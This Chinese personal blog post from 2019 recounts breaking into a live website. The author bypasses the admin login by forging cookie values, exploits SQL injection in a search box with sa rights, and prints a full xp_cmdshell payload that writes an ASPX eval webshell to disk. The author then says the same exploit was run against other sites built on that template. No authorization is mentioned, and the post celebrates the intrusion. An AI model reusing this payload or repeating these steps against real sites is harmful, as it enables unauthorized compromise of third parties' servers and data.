N0rth3ty's Blog.

记一次实战

字数统计: 621阅读时长: 2 min
2019/03/03 Share

入坑后的一次实战

简单浏览一下
挂载了一个流量分析插件
然后一个搜索功能,没了
没什么入手点,信息收集一下
有cdn,没法获取真实IP
whois什么的一通搜索后都没有什么有用信息

扫了下后台也没扫出来,有些一筹莫展
(果然没有后台路径就没地方日了
google hacking 峰回路转

image

这扫得出来才有鬼了
感觉是套比较老的模版

后台登陆用户名处可以报错泄漏了网站路径等敏感信息
部分截图
image

对登陆流程抓包分析过程中发现了一处细节
/admin_main.aspx的请求报错泄漏了源代码
image
看到是基于cookie做的判断,不知道有没有后续的验证过程,猜想可能可以越权
先构造包尝试一下
设置adminID=1后还有报错,就是在cookie中没有获取到uname,所以又在cookie加了一个uname字段
成功越权进入后台
后台有一处图片上传,一处搜索,和一个kindeditor
先看看上传
上传目录是写死的,文件强制重命名
没办法00截断
尝试后无法突破

又看了下有没有什么自己没有关注到的点
最后搜索栏发现一个注入点
mssql,sa权限
因为报错路径已知,一番折腾后调用xp_cmdshell写入一个aspx一句话

payload如下

1
1';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > d:\www\Tes.aspx';--

成功getshell

又是一番折腾把源码打包下来看了一下发现这个模版确实写得很垃圾
主站的搜索用StringFormat做了防御
image
但是后台搜索出就是裸的了
image
然后直接进行了字符串拼接导致了sql注入
审一审想看看有没有其它的洞,因为后台路径确实不好搞
然后就发现了一处前台sql注入,成因和后台的类似
然后mssql中可以用用;执行多条语句,没有waf的时候太轻松了

找了下还有其它站也用的这个模版,然后直接上刚写好的exp
又成功getshell

最后就是现在写起来感觉很简单,但是实际测试的时候遇到很多的问题
这次实战学到了不少东西
实战真爽啊

CATALOG
  1. 1. 入坑后的一次实战